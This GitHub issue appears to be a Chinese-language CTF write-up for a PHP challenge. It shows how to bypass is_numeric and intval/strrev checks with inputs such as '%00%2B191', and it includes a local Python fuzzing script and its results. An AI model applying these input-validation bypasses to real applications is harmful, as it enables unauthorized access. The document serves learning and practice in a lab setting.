Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

题2-Fuzzing思路 #7

Open
cainiaoxiaobai2016 opened this issue Nov 27, 2018 · 1 comment
Open

题2-Fuzzing思路 #7

cainiaoxiaobai2016 opened this issue Nov 27, 2018 · 1 comment

Comments

@cainiaoxiaobai2016
Copy link

http://127.0.0.1/Php_Bug/02.php?number=%00%2B191
%2B解析后为+,‘+191'=='191'且intval('191+')==191
(这道题解题思路如下

  1. 条件is_numeric($_REQUEST['number'])为假,这个绕过的方法很多使用%00开头也可以再POST一个number参数把GET中的覆盖掉也可以,所以这一步很简单。
  2. 要求 $req['number']==strval(intval($req['number']))
  3. 要求intval($req['number']) == intval(strrev($req['number']))
  4. is_palindrome_number()返回False,这个条件只要在一个回文数比如191前面加一个字符即可实现
  5. 得到flag
    看上述条件,条件4需要加字符但是加了之后需要满足2,3这两个条件所以就可以在原题目中简化出2,3,4来进行Fuzzing,简化后后端代码如下:
<?php
function is_palindrome_number($number) {
    $number = strval($number); //strval — 获取变量的字符串值
    $i = 0;
    $j = strlen($number) - 1; //strlen — 获取字符串长度
    while($i < $j) {
        if($number[$i] !== $number[$j]) {
            return false;
        }
        $i++;
        $j--;
    }
    return true;
}
$a = trim($_GET['number']);
var_dump(($a==strval(intval($a)))&(intval($a)==intval(strrev($a)))&!is_palindrome_number($a))
?>

Fuzzing代码如下:

import requests
for i in range(256):
    rq = requests.get("http://127.0.0.1/vuln/CTF/1/index.php?number=%s191"%("%%%02X"%i))
    if '1' in rq.text:
        print "%%%02X"%i

Fuzzing结果如下:

%0C
%2B
@fix-you
Copy link

fix-you commented Jun 4, 2019

学习了

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants